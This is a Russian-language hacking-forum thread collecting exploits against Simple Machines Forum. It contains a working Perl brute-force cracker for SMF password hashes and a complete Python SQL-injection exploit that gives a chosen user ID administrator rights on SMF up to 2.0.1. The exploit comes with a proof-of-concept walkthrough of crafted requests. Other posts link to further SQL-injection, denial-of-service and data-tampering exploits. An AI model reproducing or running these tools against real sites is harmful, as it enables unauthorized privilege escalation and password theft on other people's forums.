Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


[ Уязвимости SMF ]


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 8

#1
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
SMF 1.1.4-1.1.5 Password Cracker
#!/usr/bin/perl
#
# Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
# not some hack tool you kid. 
# Quickly coded, feel free to improve
#
# Iron
# http://www.randombase.com
# or better: http://www.perlforums.org
#
use Digest::SHA1 'sha1_hex';
print "
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org

Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > ";
chomp($c=<stdin>);
print "[+]Username of the target: ";
chomp($u=lc(<stdin>));
print "[+]Password hash of the target: ";
chomp($p=<stdin>);
print "[+]Cracking... could take a while";
if($c eq '1')
{
	numeric();
}
elsif($c eq '2')
{
	alpha();
}
elsif($c eq '3')
{
	mix();
}
elsif($c eq '4')
{
	dict();
}

sub numeric
{
	$i = 0;
	while(sha1_hex($u.$i) ne $p){$i++;}
	print "\n[+]Sweet! Found the password: ".$i;
}
sub alpha
{
	for($i = "a";$i ne "zzzzzzz" && sha1_hex($u.$i) ne $p;$i++){}
	print "\n[+]Sweet! Found the password: ".$i;
}
sub mix
{
	print "Not finished. Yet.";
}
sub dict # needs some cleaning to make it faster
{
	print "\n[+]I'll need a dictionary though, care to give its filename? ";
	chomp($dict=<stdin>);
	open(d,"<".$dict);
	$found = 0;
	while(($line = <d>))
	{
		chomp($line);
		if(sha1_hex($u.$line) eq $p)
		{
			print "[+]Sweet! Found the password: ".$line;
			$found = 1; next;
		}
	}
		if(!$found)
		{
			print "[-]Not sweet. I couldn't find the password in your dictionary.";
		}
}

Ссылки из под хайдов не выдаю!


#2
beep

beep

    Флудер )

  • Extended
  • PipPipPipPip
  • 623 сообщений
Simple Machines Forum - Destroyer 0.1 [http://www.securityl...tra/366302.php]

Цель: Simple Machines Forum
Воздействие: Неавторизованное изменение данных



#3
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
SMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit

Ссылки из под хайдов не выдаю!


#4
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
SMF 1.1.11 change Password Admin Vulnerabilities
потер

Ссылки из под хайдов не выдаю!


#5
beep

beep

    Флудер )

  • Extended
  • PipPipPipPip
  • 623 сообщений
там же на Joomla com_addressbook Blind SQL Injection Vulnerability ссылка )

#6
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
упс :new_russian: это все ночь. не могу найти ссылку :acute:

з.ы. ссылку потер, чтобы не вводить в заблуждение.

Ссылки из под хайдов не выдаю!


#7
Shadrin

Shadrin

    Бит

  • Members
  • 1 сообщений
SMF 1.1.11 change Password Admin Vulnerabilities
]]>http://www.allinfose...ulnerabilities/]]>
только у меня не заработало не разу

#8
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
SMF 2.0 RC3 - Denial Of Service Exploit
http://inj3ct0r.com/exploits/13987

Shadrin

Цитата

SMF 1.1.11 change Password Admin Vulnerabilities
http://www.allinfose...ulnerabilities/
только у меня не заработало не разу
ни у кого не работает.

Ссылки из под хайдов не выдаю!


#9
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
SMF <= 2.0.1 SQL Injection, Privilege Escalation
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#
#
# Exploit Title:		Smf <= 2.0.1 Sql injection Vulnerability
# Author:		   The:Paradox
# Disclosure date:  06/12/2011
# Software Link:	http://download.simplemachines.org/ , http://www.php.net/releases/
#
#
# Smf <= 2.0.1 Sql injection Vulnerability
#   - Priviledge escalation exploit
#
# INTRO:
#
#
# ------- ENGLISH -------
#
# Just disclosing all old/useless stuff on my hard drive.
#
# Nice vulnerability but too much target requirements: PHP5 < 5.1.4 or PHP4 < 4.4.3 (php Zend_Hash_Del_Key_Or_Index vulnerability affected version)
# Successfully tested on PHP versions < 5.1.4
#
# This exploit was written for version 1.1.5, updated to 1.1.11. I checked some sources, I bet it's actually working on all versions (last version is 2.0.1)
# Note: PHP4 calculed hash seems to be wrong, somehow can't get correct Zend_Hash_Del_Key_Or_Index Vulnerability hash, whatever.
#
#
#
# ------- ITALIANO -------
#
# Pubblicando tutto cio' che è diventato inutile o troppo vecchio che ho sul mio disco rigido.
#
# Vulnerabilità davvero intricata e carina, ma i target possibili effettivi sono davvero pochi visti i requirements:  PHP5 < 5.1.4 or PHP4 < 4.4.3 (php Zend_Hash_Del_Key_Or_Index vulnerability)
#
# Questa vulnerabilità esiste perchè nella realtà dei fatti i programmatori di smf non hanno mai ben compreso la mia precedente advisory,
# e fixando un po' alla meno peggio hanno mandato in conflitto due filtri di diverso tipo.
# E' davvero divertente vedere come la supponenza dei programmatori di smf sia arrivata a commentare in modo da indicarmi esattamente
# dove cercare la vulnerabilità. Commento testuale: <<Numeric keys in cookies are less of a problem. Just unset those>>, ed è proprio per questo "diverso
# trattamento" (chissà perchè poi) che la vulnerabilità esiste.
#
# L'exploit è stato scritto per 1.1.5 e precedenti, riadattato alla 1.1.11, e, attualmente, dando un'occhiata ai sorgenti, sono pronto a scommettere che funziona su
# tutte le versioni attuali (2.0.1 è l'ultima al momento del rilascio).
#
# Il poc qui sotto è scritto in un inglese cacofonico e altamente comprensibile ad un italiano, credo che fare una traduzione sia davvero superfluo, spero di non creare problemi
# di comprensione perchè questo exploit è davvero a solo "Educational Purpose" visto che cercare versioni php così vecchie che montino smf è come cercare un
# ago in un pagliaio.
#
# Per motivi che non comprendo, l'hash php4 di Zend_Hash_Del_Key_Or_Index Vulnerability non è corretto e non sono riuscito a generarlo, correggetelo nel caso vogliate testare su php4.
# Testata con successo sulle versioni vulnerabili di php5
#
#
"""
<POC>
Smf <= 1.1.11 Sql injection Vulnerability
	- Priviledge escalation exploit
			// The:Paradox
I said in my last smf advisory that 1.1.5 version was safe from
sql code injections affecting the previous version.
Now here we are to show how that's not really true.
The "patch code" (File index.php, lines 45-48) is useless in PHP 5 version < 5.1.4
and PHP 4 version < 4.4.3
First, let's see some source code:
File: index.php
----------------------------------------------------------
45. // Make sure some things simply do not exist.
46. foreach (array('db_character_set') as $variable)
47.	 if (isset($GLOBALS[$variable]))
48.		 unset($GLOBALS[$variable]);
49.
50. // Load the settings...
51. require_once(dirname(__FILE__) . '/Settings.php');
52.
53. // And important includes.
54. require_once($sourcedir . '/QueryString.php');
55. require_once($sourcedir . '/Subs.php');
56. require_once($sourcedir . '/Errors.php');
57. require_once($sourcedir . '/Load.php');
58. require_once($sourcedir . '/Security.php');
[...]
78. // Load the settings from the settings table, and perform operations like optimizing.
79. reloadSettings();
80. // Clean the request variables, add slashes, etc.
81. cleanRequest();
----------------------------------------------------------
File: Sources/Load.php
----------------------------------------------------------
138.	function reloadSettings()
139.	{
140.		global $modSettings, $db_prefix, $boarddir, $func, $txt, $db_character_set;
141.		global $mysql_set_mode, $context;
142.
143.		// This makes it possible to have SMF automatically change the sql_mode and autocommit if needed.
144.		if (isset($mysql_set_mode) && $mysql_set_mode === true)
145.			db_query("SET sql_mode='', AUTOCOMMIT=1", false, false);
146.
147.		// Most database systems have not set UTF-8 as their default input charset.
148.		if (isset($db_character_set) && preg_match('~^\\w+$~', $db_character_set) === 1)
149.			db_query("
150.				SET NAMES $db_character_set", __FILE__, __LINE__);
----------------------------------------------------------
File: Sources/QueryString.php
----------------------------------------------------------
83. function cleanRequest()
84. {
85.	 global $board, $topic, $boardurl, $scripturl, $modSettings;
86.
87.	 // Makes it easier to refer to things this way.
88.	 $scripturl = $boardurl . '/index.php';
89.
90.	 // Save some memory.. (since we don't use these anyway.)
91.	 unset($GLOBALS['HTTP_POST_VARS'], $GLOBALS['HTTP_POST_VARS']);
92.	 unset($GLOBALS['HTTP_POST_FILES'], $GLOBALS['HTTP_POST_FILES']);
93.
94.	 // These keys shouldn't be set...ever.
95.	 if (isset($_REQUEST['GLOBALS']) || isset($_COOKIE['GLOBALS']))
96.		 die('Invalid request variable.');
97.
98.	 // Same goes for numeric keys.
99.	 foreach (array_merge(array_keys($_POST), array_keys($_GET), array_keys($_FILES)) as $key)
100.			if (is_numeric($key))
101.				die('Invalid request variable.');
102.
103.		// Numeric keys in cookies are less of a problem. Just unset those.
104.		foreach ($_COOKIE as $key => $value)
105.			if (is_numeric($key))
106.				unset($_COOKIE[$key]);
----------------------------------------------------------
Now, focus on the db_character_set patch code (lines 45-48, index.php).
Unset() function is called, and is well known that it is pretty vulnerable in old php versions (see: Stefan Esser's Zend_hash_del_key_or_index vulnerability).
Whatever smf authors are not imprudent coders and they perfectly know what that means.
In fact in cleanRequest() function the script dies (line 99-101, Sources/QueryString.php) if any numeric variable in Post, Get or Files arrays was set.
Focus on the index.php.
Do you see anything vulnerable?
The "ZHDKOI patch" is called after the "db_character_set patch" is executed.
Let's have a try?
-------------------------
PHP version: 5.0.2
Smf version: 1.1.6
Request 1:
>>>	GET /smf/?db_character_set=1
	Host:   localhost
<<<	All works regularly.
Request 2:
>>>	GET /smf/?db_character_set=1&1102461922=1
	Host:   localhost
<<<	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' at line 1
---------------------
At this point, we have another problem. Even if we have successfully bypassed the db_character_set patch,
the script will die as soon as cleanRequest() is called, because our numeric variable was unset in GLOBALS array but not in GET one.
In fact if we try to give a valid value to db_character_set...
---------------------
Request 3:
>>>	GET /smf/?db_character_set=big5&1102461922=1
	Host:   localhost
<<<	Invalid request variable.
---------------------
The script will die (l. 101, QueryString.php)
Whatever, as the comment at line 103 (QueryString.php) says, platform's authors had judged that "Numeric keys in cookies are less of a problem" and to "just unset those".
Therefore if we set our numeric variable in COOKIE array, we'll successfully bypass the patch and the script will execute without exiting.
Let's try it:
---------------------
Request 4:
>>>	GET	 /smf/?db_character_set=1
	Host:   localhost
	Cookie: 1102461922=1;
<<<	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' at line 1
Request 5:
>>>	GET /smf/?db_character_set=big5
	Host:   localhost
	Cookie: 1102461922=1;
<<<	All works regularly.
---------------------
In short, the vulnerability exists because "ZHDKOI vulnerability checks" are done only AFTER the patch code is executed.
At this point, as showed in the previous advisory, a big percentage of sql queries are vulnerable making sql code injection possible.
Have fun =D
Discovered: about 1 week after SMF 1.1.5 release
</POC>
"""
from sys import argv, exit
from httplib import HTTPConnection
from urllib import urlencode, unquote
from time import sleep
print """
#=================================================================#
#				   Simple Machines Forum <= 1.1.4				#
#					Sql Injection Vulnerability				  #
#				   Priviledge Escalation Exploit				 #
#																 #
#			 Adapted to work either for 2.0.1 and below		  #
#																 #
#				   Spongebob approved this exploit			   #
#																 #
#					  .--..--..--..--..--..--.				   #
#					.' \  (`._   (_)	 _   \				   #
#				  .'	|  '._)		 (_)  |				   #
#				  \ _.')\	  .----..---.   /				   #
#				  |(_.'  |	/	.-\-.  \  |				   #
#				  \	 0|	|   ( O| O) | o|				   #
#				   |  _  |  .--.____.'._.-.  |				   #
#				   \ (_) | o		 -` .-`  |				   #
#					|	\   |`-._ _ _ _ _\ /					#
#					\	|   |  `. |_||_|   |					#
#					| o  |	\_	  \	 |	 -.   .-.	   #
#					|.-.  \	 `--..-'   O |	 `.`-' .'	   #
#				  _.'  .' |	 `-.-'	  /-.__   ' .-'		 #
#				.' `-.` '.|='=.='=.='=.='=|._/_ `-'.'			#
#				`-._  `.  |________/\_____|	`-.'			  #
#				   .'   ).| '=' '='\/ '=' |					  #
#				   `._.`  '---------------'					  #
#						   //___\   //___\					   #
#							 ||	   ||						 #
#							 ||_.-.   ||_.-.					 #
#							(_.--__) (_.--__)					#
#																 #
#====================================#============================#
# Server Configuration Requirements  #							#
#====================================#							#
# SMF <= 1.1.4							   register_globals = 1 #
#																 #
# 1.1.4 < SMF <= 1.1.11					  register_globals = 1 #
#									PHP5 < 5.1.4 or PHP4 < 4.4.3 #
#=================================================================#
# Usage:														  #
#  ./Exploit [Target] [Path] [PHPSessID] [Userid]				 #
#																 #
# Example:														#
#  ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9   #
#  ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36   #
#=================================================================#
# email: wegotyourbox[at]gmail[dot]com				The:Paradox #
#=================================================================#
# POC inside:				PLEASE -READ- before use #
#=================================================================#
"""
# just answering someone: PHPSESSID IS "YOUR" LOGIN COOKIE FAGS
# Thanks LGB for ascii art
if len(argv) <= 4: exit()
sn = "PHPSESSID" # Session cookie name. You may have to change this.
port = 80
target = argv[1]
path = argv[2]
sv = argv[3]
uid = argv[4]
class killsmf:
	def __init__(self):
		print "[.] Exploit Starts."
		self.GetSesc()
		self.CreateLabels()
		self.Inject()
		print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-"
	def GetSesc(self):
		print "[+] Trying to read Sesc"
		for i in range (0,2):
				conn = HTTPConnection(target,port)
				conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
				rsp = conn.getresponse()
				r = rsp.read()
		if rsp.status == 404:
				exit ("[-] Error 404. Not Found")
		elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 :
				self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0]
				if len(self.sesc) != 32: exit ("[-] Invalid Sesc")
				print "[+] Sesc has been successfully read ==> "+self.sesc
		else:
				exit ("[-] Unable to find Sesc")
	def CreateLabels(self):
		print "[+] Creating three labels..."
		for i in range (0,3):
				conn = HTTPConnection(target,port)
				conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
				sleep(4)
	def Inject(self):
		print "[+] Sql code is going to be injected."
		conn = HTTPConnection(target,port)
		conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + "; 1102461922=1; -1283274824=1;"})
killsmf()

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных